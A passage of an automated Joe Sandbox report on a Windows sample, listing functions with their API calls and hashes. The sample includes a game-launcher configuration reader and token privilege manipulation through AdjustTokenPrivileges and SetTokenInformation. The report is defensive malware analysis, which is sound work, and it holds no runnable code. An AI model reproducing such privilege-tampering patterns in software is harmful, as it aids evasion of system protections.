                                • Instruction Fuzzy Hash: 0611C671504348BEE7118F688C80B9ABBECEF053A4F10895DF595A72C1D2B1AD448B20
                                Function 100080E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset
                                • String ID:
                                • API String ID: 2102423945-0
                                • Opcode ID: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                • Instruction ID: 3476ce63d3aaa573aec64c0bffa9ef49cde6163629ebf3a1eccc858e77ab2209
                                • Opcode Fuzzy Hash: 7213c61829fe7ab4cc5639b422b216faffa918b448852484d9944ef95b569b9c
                                • Instruction Fuzzy Hash: 1D416F75D0021B9BEB10DF64CC81A9DBBB5FF403E4F214569E468A719ADB30AB858F90
                                Function 0040E360 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memmove_s
                                • String ID:
                                • API String ID: 800865076-0
                                • Opcode ID: 3095cf917f2350286aade5e2211f468d19bdb81fb379ed52de83f2cf1c14f51f
                                • Instruction ID: f6c7b27f8eaff605af0a22a58acb08d8d1cbec46cf9e307574cfe919ceb240e6
                                • Opcode Fuzzy Hash: 3095cf917f2350286aade5e2211f468d19bdb81fb379ed52de83f2cf1c14f51f
                                • Instruction Fuzzy Hash: 0121C331600504EFCB00DF5AC889C6EF7A9EF94324B10896EFC046B390DA35AD20DB99
                                Function 10008A54 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 736c95ca4fd3135a2edcbb07283ab68ac9dc71f1ba12f3538e4f7f7cb6d74957
                                • Instruction ID: b89cec954c075b730a56da69cb46cafd068f6b8bae9ad87e748e45a88384cad6
                                • Opcode Fuzzy Hash: 736c95ca4fd3135a2edcbb07283ab68ac9dc71f1ba12f3538e4f7f7cb6d74957
                                • Instruction Fuzzy Hash: D5018B31604B12EFF721CF18D88085AB7E8FB862E07300A1BE4E5E3989D770AE418B51
                                Function 1000BA57 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___crtCorExitProcess.LIBCMT ref: 1000BA5F
                                  • Part of subcall function 1000BA2C: GetModuleHandleW.KERNEL32(100185B8,?,1000BA64,00000000,?,1000B4FA,000000FF,0000001E,00000001,00000000,00000000,?,10010014,00000000,00000001,00000000), ref: 1000BA36
                                  • Part of subcall function 1000BA2C: GetProcAddress.KERNEL32(00000000,100185A8), ref: 1000BA46
                                • ExitProcess.KERNEL32 ref: 1000BA68
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                • String ID:
                                • API String ID: 2427264223-0
                                • Opcode ID: abc46e778dca3db5ce812f73b672184a6f01df30641a4562d6bbc8916ecbfb88
                                • Instruction ID: 9e8f86a35322aa789f4e0151c64d6b54dfcfdd38f63c23601c9c439c46ba9861
                                • Opcode Fuzzy Hash: abc46e778dca3db5ce812f73b672184a6f01df30641a4562d6bbc8916ecbfb88
                                • Instruction Fuzzy Hash: 59B09B311001087BDB015F15CC4D85D3F1ADB812A07104010F40405131DF71EE52D681
                                Function 0040E1B0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memcpy_s
                                • String ID:
                                • API String ID: 2001391462-0
                                • Opcode ID: 445250c8ed87e1bebe8596cf02b04436651d17126fa6f344ecf8848ff3af567b
                                • Instruction ID: be568734a41f28fb349ccf2bf21350fb7fb647c90ab0f50d062a53d9c7b53683
                                • Opcode Fuzzy Hash: 445250c8ed87e1bebe8596cf02b04436651d17126fa6f344ecf8848ff3af567b
                                • Instruction Fuzzy Hash: 4C116D76600604AFC318CFA9C881C6AB3A9FF893107148AAEF5598B351EB31ED00CBD4
                                Function 1000FC7C Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 1000FCBF
                                  • Part of subcall function 1000DDF3: __getptd_noexit.LIBCMT ref: 1000DDF3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocateHeap__getptd_noexit
                                • String ID:
                                • API String ID: 328603210-0
                                • Opcode ID: a67366d662c5bd092a589687f11339a4dae3e25b87bc1b37a2dbb48db3d3f10c
                                • Instruction ID: 636ff11a492ce15cdcdc60a6e11a12ef751a60b812adc93f976add26828ff1dc
                                • Opcode Fuzzy Hash: a67366d662c5bd092a589687f11339a4dae3e25b87bc1b37a2dbb48db3d3f10c
                                • Instruction Fuzzy Hash: 2301F13520026E9BFB14CF25CE56FBA3399EB803E4F12412DEC16CA998C730EC01E680
                                Function 10008B0F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentDirectoryA.KERNEL32(00000103,00000140,000000FE,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10008B2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CurrentDirectory
                                • String ID:
                                • API String ID: 1611563598-0
                                • Opcode ID: c4b11cf663dedc9a4aa197a2d062e931ecfd140e47d02db53880576ec9a3b569
                                • Instruction ID: 05fb876ac0a7ffa909206c90f41a6c21d31a4450f3bef0f042e6b82b858db211
                                • Opcode Fuzzy Hash: c4b11cf663dedc9a4aa197a2d062e931ecfd140e47d02db53880576ec9a3b569
                                • Instruction Fuzzy Hash: 6301B1B6100A468EF321CE24C815BD63BE9FB003E0F244129E5D58B195EB34D748C714
                                Function 10007E17 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 8be2a931f1bb5c1e663c23c7387cc1016260f232cf004776458d173a503434cf
                                • Instruction ID: a59443ee6d1aeaa2d9ed199805bd91a064a26d0d23d6a45f21f6b6edd1a505ad
                                • Opcode Fuzzy Hash: 8be2a931f1bb5c1e663c23c7387cc1016260f232cf004776458d173a503434cf
                                • Instruction Fuzzy Hash: 11F0D1B1C1B1D29EFB6CCB04C818D5A7687FB9C2D4B1680EAE40C5B029D6148D40EA94
                                Function 0054DC5B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 0054DC62
                                  • Part of subcall function 005381C8: __CxxThrowException@8.LIBCMT ref: 005381DE
                                  • Part of subcall function 005381C8: __EH_prolog3.LIBCMT ref: 005381EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: H_prolog3$Exception@8Throw
                                • String ID:
                                • API String ID: 2489616738-0
                                • Opcode ID: 14618eda43c9671e68b8fd08d8422abacf40353be5bf252deb74d13aaf15f6c9
                                • Instruction ID: d695574f4330ccb503b9121505bbc1850e9446592826f94646e43469e9bdd42a
                                • Opcode Fuzzy Hash: 14618eda43c9671e68b8fd08d8422abacf40353be5bf252deb74d13aaf15f6c9
                                • Instruction Fuzzy Hash: 85015E706012039BDB24AF34C85A3AA7AB2BBC1355F10812CA4818B290EF758D40CB65
                                Function 10007E76 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNEL32(FA83E855,?,00000001,00000001,00000000,?,?,1000808D,?,00000404,00000001,00000000,?,00000000), ref: 10007E93
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: e7d503647b2602c65f330093808bd1a8c877245a2ba7fd444c54634443dd94a4
                                • Instruction ID: 60dde942ee128e8b5e26815de62b9c1eeda109e52923c3b51a2d140b3793f235
                                • Opcode Fuzzy Hash: e7d503647b2602c65f330093808bd1a8c877245a2ba7fd444c54634443dd94a4
                                • Instruction Fuzzy Hash: 6001AD72A00249AFE720CE19CC40A8ABBFAFB94380F148429F849C6650D330FD558B50
                                Function 1000961C Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3.LIBCMT ref: 10009623
                                  • Part of subcall function 1000BD08: _malloc.LIBCMT ref: 1000BD22
                                  • Part of subcall function 1000BD08: std::exception::exception.LIBCMT ref: 1000BD57
                                  • Part of subcall function 1000BD08: std::exception::exception.LIBCMT ref: 1000BD71
                                  • Part of subcall function 1000BD08: __CxxThrowException@8.LIBCMT ref: 1000BD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
                                • String ID:
                                • API String ID: 2311266369-0
                                • Opcode ID: 798ab431fcf6c30b07a15d25c3bea45351add4a6768e397aed1a5e0b6ce581e3
                                • Instruction ID: 27f0851c2b2a3c9f21f6ca51572d52810aa293ac0cd731c366aa61cf9dad0c11
                                • Opcode Fuzzy Hash: 798ab431fcf6c30b07a15d25c3bea45351add4a6768e397aed1a5e0b6ce581e3
                                • Instruction Fuzzy Hash: 84F0BB759156219BFB11DFA0980275D79A0FF00BE0F528201FC945F2D9DF76DE409794
                                Function 0040DE00 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceW.KERNEL32(?,?,00000006), ref: 0040DE18
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FindResource
                                • String ID:
                                • API String ID: 1635176832-0
                                • Opcode ID: fb2d69a0bd7a020fb47280c1843f21d7131e2cb85a0d31c312364452428a4122
                                • Instruction ID: f5cd0bbd57078f271fb784681db4e8cb7893742734e3648512ee1e3932500a40
                                • Opcode Fuzzy Hash: fb2d69a0bd7a020fb47280c1843f21d7131e2cb85a0d31c312364452428a4122
                                • Instruction Fuzzy Hash: 78E08C3670002837D6101A8ABC019BBB76CCAC2ABAB00403BF949EA240E675A81652F1
                                Function 1000CFC4 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __flsbuf
                                • String ID:
                                • API String ID: 2056685748-0
                                • Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                • Instruction ID: cd085754fea585c1a0c37b1266a5e6987fea52fd14f6493696e28795b49d8eb2
                                • Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
                                • Instruction Fuzzy Hash: A3E09A3000034A8AEB108B20D001A367BA6DF01AA9F3086EEE585880EBC73A8447DA11
                                Function 1000AA9E Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                • _malloc.LIBCMT ref: 1000BD22
                                  • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                  • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                  • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AllocateHeap_malloc
                                • String ID:
                                • API String ID: 501242067-0
                                • Opcode ID: 2048147662bf453ba28ede84f0b6aa2d186b29f79e00af96329dcc402269dd3d
                                • Instruction ID: a6a3255abbbc7b23de097487aa0110c8e60a8e847636431691c925b7fdd1c164
                                • Opcode Fuzzy Hash: 2048147662bf453ba28ede84f0b6aa2d186b29f79e00af96329dcc402269dd3d
                                • Instruction Fuzzy Hash: E5C01225104A0D727660BD6E580A92ABE8DCBC15E4E750452ED145618BFD52E812A1D1
                                Function 1000BCAF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • _doexit.LIBCMT ref: 1000BCBB
                                  • Part of subcall function 1000BB6F: __lock.LIBCMT ref: 1000BB7D
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __lock_doexit
                                • String ID:
                                • API String ID: 368792745-0
                                • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                • Instruction ID: 4fbdee38a6290eebd8f6056f661dc23ca866b053305f8b7d48e45ec78bfe802d
                                • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                • Instruction Fuzzy Hash: FDB0923258020C73EA201946AC03F163B0987C0AA0E240020BA0C2D1A5AAA2B9618089
                                Function 100078B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _calloc
                                • String ID:
                                • API String ID: 1679841372-0
                                • Opcode ID: 4155536734e8379bf1a0d9e46d5e55f6b57c4bb927480cacbb9fba63a04539cd
                                • Instruction ID: 2cd9351d4dfc93e9d47943277064b3f92f2890c0e3242ea62fae913676b3161e
                                • Opcode Fuzzy Hash: 4155536734e8379bf1a0d9e46d5e55f6b57c4bb927480cacbb9fba63a04539cd
                                • Instruction Fuzzy Hash: 12B0923204C34CBBAF055E81FC0289A3BA9EB40170B20401AFA18040616E33B4205648
                                Function 0053A5F7 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 0053A606
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: DeleteObject
                                • String ID:
                                • API String ID: 1531683806-0
                                • Opcode ID: d001c22539f3a6c22b27cffa3d4342250f635b76db201f74bd7546d7a7e5189c
                                • Instruction ID: e7ab8058f96d9e082f81e297ae5c7e94aa700416bc84cc35b96cdea81974e626
                                • Opcode Fuzzy Hash: d001c22539f3a6c22b27cffa3d4342250f635b76db201f74bd7546d7a7e5189c
                                • Instruction Fuzzy Hash: FCB09270802102AADF00AB708A0E3263E547B9130AF059894A08081005EAB980829A01
                                Function 100078C3 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 100078C9
                                  • Part of subcall function 1000B491: RtlFreeHeap.NTDLL(00000000,00000000,?,1000B064,?,?,1000101C), ref: 1000B4A7
                                  • Part of subcall function 1000B491: GetLastError.KERNEL32(?,?,1000B064,?,?,1000101C), ref: 1000B4B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ErrorFreeHeapLast_free
                                • String ID:
                                • API String ID: 1353095263-0
                                • Opcode ID: 9c7efb68590269b2fc63797ccf94f6312e3d7331e264a762345e77b913906a88
                                • Instruction ID: 64862a2d9b442625a5b0b759a32f449ecd248fb1dd9277ac75d4e02be58b0dbe
                                • Opcode Fuzzy Hash: 9c7efb68590269b2fc63797ccf94f6312e3d7331e264a762345e77b913906a88
                                • Instruction Fuzzy Hash: 40A0223200C30C3BAF002E82FC0380A3B8CCB000B0B20C022F80C080232E33BA200088

                                Non-executed Functions

                                Function 004107D9 Relevance: 100.7, APIs: 45, Strings: 12, Instructions: 912windowfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemMenu.USER32(?,00000000), ref: 004107F8
                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00410873
                                • AppendMenuW.USER32(?,00000000,00000010,00000010), ref: 00410882
                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 004108C3
                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 004108D7
                                • _memset.LIBCMT ref: 004108EF
                                • _memset.LIBCMT ref: 0041090A
                                • _memset.LIBCMT ref: 00410925
                                • _memset.LIBCMT ref: 00410940
                                • _memset.LIBCMT ref: 0041095B
                                • _memset.LIBCMT ref: 00410976
                                • _memset.LIBCMT ref: 004109C3
                                • _memset.LIBCMT ref: 004109DE
                                • _memset.LIBCMT ref: 004109F9
                                • GetPrivateProfileStringW.KERNEL32(Default,Url,006FD638,?,00000200,?), ref: 00410A29
                                • GetPrivateProfileStringW.KERNEL32(Default,006FD160,006FD638,?,00000200,?), ref: 00410A4D
                                • GetPrivateProfileStringW.KERNEL32(Default,006FD174,006FD638,?,00000200,?), ref: 00410A71
                                • GetPrivateProfileStringW.KERNEL32(Default,006FD178,006FD638,?,00000200,?), ref: 00410A95
                                • GetPrivateProfileStringW.KERNEL32(Default,006FD17C,006FD638,?,00000200,?), ref: 00410AB9
                                • GetPrivateProfileStringW.KERNEL32(Default,006FEA38,006FD638,?,00000200,?), ref: 00410ADD
                                • GetPrivateProfileStringW.KERNEL32(Game,Client,006FD638,?,00000200,?), ref: 00410B01
                                • GetPrivateProfileStringW.KERNEL32(Game,ParamFormat,HOST=%d PARAM1=%s,?,00000200,?), ref: 00410B25
                                • GetPrivateProfileStringW.KERNEL32(AppendConfig,Append,006FD638,?,00000200,?), ref: 00410B49
                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 00410C58
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000001,?), ref: 00410C68
                                • GetPrivateProfileStringW.KERNEL32(Default,Url,006FD638,?,00000200,?), ref: 00410C90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: PrivateProfileString$_memset$Menu$AppendMessageSend$CloseCreateFileHandleSystem
                                • String ID: --feihuo$Append$AppendConfig$Client$Default$Game$HOST=%d PARAM1=%s$LauncherShellExecuteGame$ParamFormat$SetLayeredWindowAttributes$Url$User32.DLL
                                • API String ID: 3045574127-1323054628
                                • Opcode ID: 93590102ca61661659adb8fba72ca27c59ca443194793713e0817189d5c73e16
                                • Instruction ID: 4260995b1a6f5113922751a41fe8d6b2d855cf4499bde5764cabfc71aca86193
                                • Opcode Fuzzy Hash: 93590102ca61661659adb8fba72ca27c59ca443194793713e0817189d5c73e16
                                • Instruction Fuzzy Hash: 3F72D670A40209AFD714DB64CC46FEAB37ABF44314F048699F619A72D1DBB4AE84CF94
                                Function 026D18EE Relevance: 48.3, APIs: 24, Strings: 3, Instructions: 1054COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 026D1776: GetCurrentProcess.KERNEL32(00000028,?), ref: 026D178C
                                  • Part of subcall function 026D1776: OpenProcessToken.ADVAPI32(00000000), ref: 026D1793
                                  • Part of subcall function 026D1802: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 026D1825
                                  • Part of subcall function 026D1802: _memset.LIBCMT ref: 026D183A
                                  • Part of subcall function 026D1802: Process32FirstW.KERNEL32(00000000,?), ref: 026D1854
                                  • Part of subcall function 026D1802: CloseHandle.KERNEL32(00000000), ref: 026D188E
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D1931
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D194B
                                • CloseHandle.KERNEL32(?), ref: 026D1958
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D198E
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D1BD1
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D1BEF
                                • CloseHandle.KERNEL32(?), ref: 026D1BFC
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D1C35
                                • GetLengthSid.ADVAPI32(?), ref: 026D1E21
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 026D1E34
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D1E69
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D1E87
                                • CloseHandle.KERNEL32(?), ref: 026D1E94
                                • GetLengthSid.ADVAPI32(?), ref: 026D20B9
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 026D20CC
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D2165
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D1ECD
                                  • Part of subcall function 026D18A4: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D18DC
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 026D2101
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 026D211F
                                • CloseHandle.KERNEL32(?), ref: 026D212C
                                • GetLengthSid.ADVAPI32(?), ref: 026D2351
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 026D2364
                                Strings
                                Memory Dump Source
